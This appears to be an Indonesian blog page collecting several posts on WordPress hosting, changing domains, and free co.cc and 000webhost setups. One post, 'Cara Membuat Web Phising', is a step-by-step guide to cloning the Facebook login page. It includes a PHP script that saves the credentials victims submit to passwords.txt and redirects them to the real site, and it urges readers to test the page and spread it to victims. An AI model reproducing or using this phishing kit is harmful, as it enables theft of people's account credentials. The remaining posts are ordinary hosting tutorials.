Update Otomatis di Byethost Dengan Edit wp-config.php

Update Otomatis di Byethost Dengan Edit wp-config.php?- Cuma sekedar review sama buat catatan saja. Barang kali saya lupa sama script yang di taruh di wp-config.php itu. Saya tidak akan panjang lebar karena ini trik saya dapatkan dari cafeblogger.web.id dengan artikel tentang cara update Worpress di byethost.
Kebetulan sekali karena saya salah satu pengguna Hosting Gratis dari byethost juga (walaupun semua Free Web Hosting sudah saya jajal semua). Baiklah, jadi intinya begini, saya cuma ingin memberti tahu anda yang ber-hosting di ByetHost apabila sebenarnya bisa Update atau Upgrade Plugin, Themes?dan WordPress itu sendiri di Byethost.
Update Otomatis di Byethost Dengan Edit wp-config.php
Ingin tahu caranya? Sudah kelihatan juga dari judul postingan “Update Otomatis di Byethost Dengan Edit wp-config.php”. Cara nya anda disuruh edit “wp-config.php” tapi sebenernya tidak akan mengubah script aslinya kok cuma sekedar menambahkan script agar bisa Update otomatis lewat dasboard WordPress di Byethost.
Copy Script PHP di bawah ini kemudian paste pada akhir?”wp-config.php”.
Continue reading Update Otomatis di Byethost Dengan Edit wp-config.php

Cara Mengganti Domain Website Lama Ke Domain Baru

DomainCara Mengganti Domain Website Lama Ke Domain Baru -?Setelah sekian lama saya mencari sampai jengkelitan tidak karuan, akhirnya saya bisa menyelesaikan masalah Mengganti domain lama ke domain yang baru. Sebenernya ini bukan domain asli blog saya melainkan pindahan dari .co.cc nama domainnya pun sama. Setelah saya pikir – pikir mendapat rezeki lumayan mau coba – coba plus iseng – iseng beli domain yang murah tapi yang penting premium, lagi pula domainnya juga tidak jelek. domain www.kentos.org sekarang menjadi domain blog ini.
Okeh, tapi sekarang bukan saatnya membahas tentang membeli domain premium tapi kita akan membahas tentang cara mengganti domain lama ke domain baru, jadi mari kita lanjutkan membahas tentang cara mengganti domain lama ke domain yang baru.
Bagi newbiee atau orang awam seperti saya masih sangatlah polos untuk hal seperti ini ( emang saya bisanya apa ya ?? ) he,, Ya, saya juga sama disini, membuat blog sambil belajar dan bertukar pikiran informasi yang kita punya. Jadi untuk artikel ini kita share sambil bercerita. he,

Cara Mengganti Domain Website Lama Ke Domain Baru

  • Masuk ke Cpanel Hostingan anda.
  • Backup MySQL Database blog anda ke localhot atau komputer anda.
  • Buka dengan editor text, untuk di windows gunakan notepad sedangkan di linux gunakan gedit. ( tergantung editornya )
  • Pilih menu search dan klik replace.
  • Ketikan nama domain lama anda di kolom search for.
  • Ketikan nama domain baru anda di kolom replace with.
  • Kemudian klik replace all.

Otomatis kata yang mengandung nama domain lama anda sudah berubah menjadi nama domain anda yang baru. Pastikan sudah tergantikan semua nama domain lama anda menjadi nama domain anda yang baru.

  • Masuk Cpanel hostingan anda kembali.
  • Pilih menu phpmyadmin.
  • Pilih MySQL Database blog anda yang lama.
  • Pilih import dan upload kembali MySQL Database yang sudah anda edit tadi.
  • Arahkan settingan Database blog anda ke database yang udah anda edit tadi. ( secara default sudah mengarah ke database yang sudah anda edit ).

NB :Tutorial Cara Mengganti Domain Website Lama Ke Domain Baru?saya buat berdasarkan pengalaman saya memindahkan / mengganti domain blog ini. Untuk CMS wordpress anda harus menyalin data wp-content ke directory blog baru anda, untuk me-load plugin dan themes yang anda gunakan di blog lama atau data yang sudah tersimpan di Database.

Cara Membuat Web Phising

Cara membuat Web Phising Facebook – Pada postingan kali ini saya akan membahas tentang cara membuat web phising. walaupun ini sudah berita lama yang banyak orang sudah mengetahuinya. Tapi saya yakin masih banyak yang ingin tahu tentang cara membuat web phising seperti yang anda baca sekarang ini. Apakah anda sudah tau apa itu web phising ?? Web Phisng = WEB+ Phising.
Web menurut saya adalah sebuah page/halaman yang berisi content yang di isi oleh admin/pemilik web, lebih lengkapnya kesini. Phising menurut dari yang saya baca yaitu berasal dari kata “Fishing” atau di bahasa Indonesia kan yang memiliki arti “memancing”. Lho kok Memancing? ternyata memang benar kita membuat web untuk memancing korban untuk masuk dalam perangkap Web Phising yang telah kita buat. Cara buatnya gimana ? Baik saya akan kasih tahu cara membuat web phising. Langkah – langkahnya sebagai berikut :

  1. Cari dan buka alamat yang mau dijadikan homepage/halaman utama Web Phising anda. misal http://www.facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol “Ctrl + U” di keyboard secara bersamaan. Kemudian akan muncul Source Code.
  3. Copy semua Source Code?tersebut. Tekan “Ctrl + A(untuk blok semua source code) kemudian tekan “Crtl + C(untuk meng-copy / menyaslin Source Code tersebut).
  4. Setelah itu buka notepad/wordpad (Start – all program – accessories- Notepad/Wordpad) ?di WINDOWS?atau gedit (Applications – ?Accessories – Gedit Text Editor) di LINUX.
  5. Paste Source Code?(ctrl + v) yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan “Crtl + F”, isi dengan “action=(tanpa tanda petik)
  7. Ketemu
    <form action="fb.com" method="post">
  8. Ganti fb.com” (contoh) dengan “phising.php”.
  9. Ubah “postmenjadi “GET“.
  10. Save as (file – Save as) atau tekan “Ctrl + S”. Berinama dengan “index.html” dan File Type pilih “All FIle”
  11. .Buka notepad lagi (langkah sama seperti nomor 4).
  12. Copy Paste Code PHP ini ke notepad :
    <?php header ('Location: http://fb.com ');
    $handle = fopen(passwords.txt, a);
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, =);
    fwrite($handle, $value);
    fwrite($handle, rn);
    }
    fwrite($handle, rn);
    fclose($handle);
    exit;
    ?>
  13. Ganti “http://fb.com” dengan “http://facebook.com” misal (tanpa tanda kutip).
  14. Save dengan nama phising dan extensi .php jadinya phising.php (Caranya sama seperti langkah no. 10)
  15. Upload ke hosting anda. (Silahkan cari hosting gratis atau berbayar, tidak disarankan menggunakan Hosting Gratis 000webhost untuk membuat web phising. Namun jika ingin tahu Cara Upload File di Free Hosting 000webhost silahkan baca saja. Satu lagi, pastikan domain anda sudah mengarah ke hosting anda. Jika anda tidak mengerti silahkan pelajari tentang Domain dan Hosting terlebih dahulu.
  16. Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk file passwords.txt, agar password yang di ketikan oleh korban dapat tersimpan.
  17. Selesai. Silahkan Coba akes Domain anda dan apa yang anda lihat? Jika tampilan mirip seperti halaman ketika anda membuka website yang anda tiru berarti benar.
  18. Silahkan anda test apakah WebPhising buatan anda sukses dapat menyimpan email dan password korban.
  19. Jika berhasil menyimpan informasi login korban seperti email dan password, waktunya sebarkan web phising anda dengan kecerdikan anda.

Sekian dulu postingan cara membuat web phising apabila anda masih bingung jangan malu bertanya. 😀

Cara Mendaftar Domain Gratis Co.CC, Sudah ter-index Google Kembali

Cara Mendaftar Domain Gratis Co.CC, Sudah ter-index Google Kembali – Artikel kali ini saya buat siang hari yang lagi mendung sih. Untung mendung kalo panas pasti dah ga nahan pengen cepet buka puasa. 😀 Dibulan yang suci ini mari kita manfaatkan dengan sebaik – baiknya. Kok malah bahas puasa?? ya udah kita kembali ke judul post kali ini. Kali ini saya akan mengajarkan anda Cara Mudah Membuat Weblog dengan Hosting dan Domain Sendiri.

Untuk Cara pembuatan weblog ini saya menggunakan hosting gratis dari 000webhost,?saya pilih hosting gratis?000webhost karena yang saya ketahui jika hosting di 000webhost 100% gratis (CMIIW). Beberapa fitur yang dimiliki 000webhost, sebagai berikut :

  • 1500 MB of Disk Space
  • 100 GB Bandwidth
  • Your own domain hosting
  • cPanel Control panel
  • Website Builder
  • Over 500 website templates ready for download
  • Free POP3 Email Box and Webmail access
  • FTP and Web based File Manager
  • PHP, MySQL, Perl, CGI, Ruby
  • No Ads at all !

Yang kedua saya menggunakan domain dari co.cc. Domain dari dot co dot cc alias co.cc ini juga 100% gratis setiap tahun dapat diperpanjang / diperbarui sebesar $0, alias gratis. Untuk CMS saya menggunakan wordpress.org karena CMS ini yang sangat familliar dan sangat mudah untuk di gunakan.

Baik untuk memulai Cara Mudah Membuat Weblog dengan Hosting dan Domain Sendiri anda harus daftar domain terlebih dahulu, seperti yang saya paparkan di atas apabila anda ingin membuat blog 100% Gratis ikuti tutorial saya tentang Cara Mudah Membuat Weblog dengan Hosting dan Domain Sendiri. Untuk daftar domain gratis co.cc silahkan klik disini atau klik banner.
Setelah anda sudah memasuki homepage co.cc sekarang anda bisa cek ketersediaan domain. Anda bisa cek apakah domain yang ingin anda pakai sudah terpakai atau masih tersedia. Lebih jelas lihat gambar dibawah.

Ketikan nama domain yang ingin anda daftarkan di kotak antara www. dan .co.cc, setelah anda menuliskan nama domain anda lanjutkan dengan menekan tombol check availability. Apabila nama domain ada “tidak tersedia” silahkan cari nama domain yang lain yang masih “tersedia”. Tetapi apabila nama domain anda tersedia dan siap digunakan akan muncul seperti gambar dibawah ini. Setelah muncul seperti gambar diatas silahkan klik Continue to registration. Ini belum selesai masih banyak langkah – langkahnya. Setelah anda klik continue to registration sekarang anda akan di berikan tampilan seperti berikut.

Login dengan akun yang sudah anda daftar kan, namun apabila yang belum daftar sekarang anda bisa daftar ke co.cc dengan mudah. Caranya klik Create an account now.

dan akan muncul seperti gambar dibawah. Isi data – data anda dengan lengkap dan benar selanjutnya beri cek I accept trims of services dan klik create an acnount now. Ini tandanya domain yang anda daftarkan sudah berhasil dan segera setup domain anda sebelum 48jam jika tidak pendaftaran akan dibatalkan. Baik untuk membuat domain cukup sampai disini dulu karena domain sudah siap digunakan dan akan dihubungkan ke hosting gratis 000webhost yang sudah saya sebutkan. Untuk menghubungkan domain dengan hosting anda harus setup dns server terlebih dahulu. Caranya klik setup kemdian pilih ?Name Server (DNS) dan masukan Nama Server (NS) hosting anda di kolom yang tersedia.

Jika anda menggunakan 000webhost gunakan ns01.000webhost.com dan ns02.000wenhost.com.

Bersambung. . . lanjutan?Tutorial Blog Hosting Gratis 000Webhost.

Tutorial Blog Hosting Gratis 000Webhost

Tutorial Blog Hosting Gratis 000Webhost ini saya akan melanjutkan dari?Cara Mendaftar Domain Gratis Co.CC, Sudah ter-index Google Kembali?yang baru sampai pendaftaran domain co.cc .

Kali ini saya akan melanjutkan tentang pembuatan hosting. Tentu saja gratis, 100% gratis malah jadi anda tidak usah mengeluarkan sepeserpun untuk membeli hosting. Sekarang kalian menuju 000webhost ( saya contohkan menggunakan 000webhost saja ). setelah anda masuk homepage, kali ini anda akan di beri dua pilihan antaranya free hosting dan premium hosting. Bagi anda yang ingin dompet anda utuh atau hanya ngin sekedar belajar mungkin, anda bisa pilih yang free hosting saja, namun apabila anda mempunya dana yang cukup untuk mencoba plan premium hosting bisa pilih yang premium hosting. ?Tetapi pada kesempatan kali ini saya akan memberi tutorial tentang free hosting ( soalnya belum coba yang premium hosting 😀 ).

Untuk mendaftar pilihlah order now yang berada pada paket masing – masing atau ingin yang free hosting bisa langsung klik sign up. Setelah itu akan muncul halaman?Order Free Web Hosting, isi semua kolom isian.

Isi kn domain yang anda daftar kn di co.cc seperti postingan tentang Cara Mendaftar Domain Gratis Co.CC, Sudah ter-index Google Kembali.

Lihat pada kolom status yang bertuliskan Verification in progress ini artinya anda sudah selesai meregistrasi hosting anda di 000webhost, dan kini kita menunggu paling lambat 24 jam untuk bisa masuk ke cpanel.

OK, bersambung dulu ya gan sampe disini. . .

Nanti lanjut lagi. . . 😀